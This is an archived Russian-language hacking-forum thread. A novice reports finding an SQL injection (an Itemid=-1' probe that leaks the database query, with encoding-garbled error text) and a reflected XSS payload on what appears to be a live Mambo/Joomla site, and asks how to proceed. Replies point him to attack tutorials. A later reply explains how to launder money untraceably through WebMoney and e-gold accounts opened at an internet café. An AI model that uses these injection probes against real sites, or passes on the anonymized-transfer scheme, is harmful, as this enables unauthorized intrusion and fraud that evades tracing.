Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

07.10.2006, 22:57
|
|
Новичок
Регистрация: 26.08.2006
Сообщений: 2
Провел на форуме: 27711
Репутация:
5
|
|
нид хелп
Такс нашел вот что:
index.php?option=content&task=view&pass=6&Itemid=-1
Выдает значит:
MA DB function failed with error number 1064
х ЧБУ ПЫЙВЛБ Ч ЪБРТПУЕ. йЪХЮЙФЕ ДПЛХНЕОФБГЙА РП ЙУРПМШЪХЕНПК ЧЕТУЙЙ MySQL ОБ РТЕДНЕФ ЛПТТЕЛФОПЗП УЙОФБЛУЙУБ ПЛПМП '(); ' OR mm.menuid = '0') ORDER BY ordering' ОБ УФТПЛЕ 5 SQL=SELECT id, title, module, position, content, showtitle, params FROM mos_modules AS m, mos_modules_menu AS mm WHERE m.published='1' AND m.access <= '0' AND m.position='user2' AND mm.moduleid=m.id AND (mm.menuid = '-1'' OR mm.menuid = '0') ORDER BY ordering
SQL =
SELECT id, title, module, position, content, showtitle, params
FROM mos_modules AS m, mos_modules_menu AS mm
WHERE m.published='1' AND m.access <= '0' AND m.position='user2'
AND mm.moduleid=m.id
AND (mm.menuid = '-1'' OR mm.menuid = '0')
ORDER BY ordering
Вот решил проверить на выполнение скрипта:
index.php?option=content&task=view&pass=6&Itemid=-1'<script>alert();%20</script>
Работает....
Киньте плиз, либо линк, либо подскажите что дальше делать. Все расписывать не обязательно, буду сам дуплить по чуть чуть...
З.Ы. Да я в Этом пока ламер, но учиться ведь надо?
З.Ы.Ы Поис юзал, особо ответа на вопрос нету
|
|
|

07.10.2006, 23:06
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
1-й шаг
index.php?option=content&task=view&pass=6&Itemid=-1
2-й шаг
index.php?option=content&task=view&pass=6&Itemid=-1'<script>alert();%20</script>
А мне всегда казалось,что это скуль...
Читай это:
_http://forum.antichat.ru/thread19605.html и всё похожее.
Все расписывать не обязательно, буду сам дуплить по чуть чуть...
Первый раз такое вижу. Парень Молодец!!!
Последний раз редактировалось Dr.Check; 07.10.2006 в 23:19..
|
|
|

07.10.2006, 23:12
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме: 6144796
Репутация:
1095
|
|
сделал xss через скуль-inj.. +)
Последний раз редактировалось Digimortal; 07.10.2006 в 23:18..
|
|
|

07.10.2006, 23:21
|
|
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме: 3493315
Репутация:
1228
|
|
про sql можеш почитать еще тут
про xss сюда
|
|
|

07.10.2006, 23:22
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме: 6144796
Репутация:
1095
|
|
Сообщение от Dr.Check
Первый раз такое вижу. Парень Молодец!!!
первый раз видишь что?
|
|
|

08.10.2006, 00:00
|
|
Новичок
Регистрация: 26.08.2006
Сообщений: 2
Провел на форуме: 27711
Репутация:
5
|
|
Спасибо.
О результатах отпишусь обязательно!
офф топ но всетаки...Где можно узнать инфу по анонимным переводам (типо w-money). Дабы безопасность максимальная была?
|
|
|

09.10.2006, 19:59
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме: 1948091
Репутация:
1686
|
|
дбы была максимальная безопасность--- заходишь в захудалую инет кофешку регишь с ихнего компа пару аков web-maney и е голд ---- перекидываешь на еголд а потом на веб мани --- (на еголд через обменник) -- конешно трохан потеряешь при переводе но зато фиг кто докапается
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|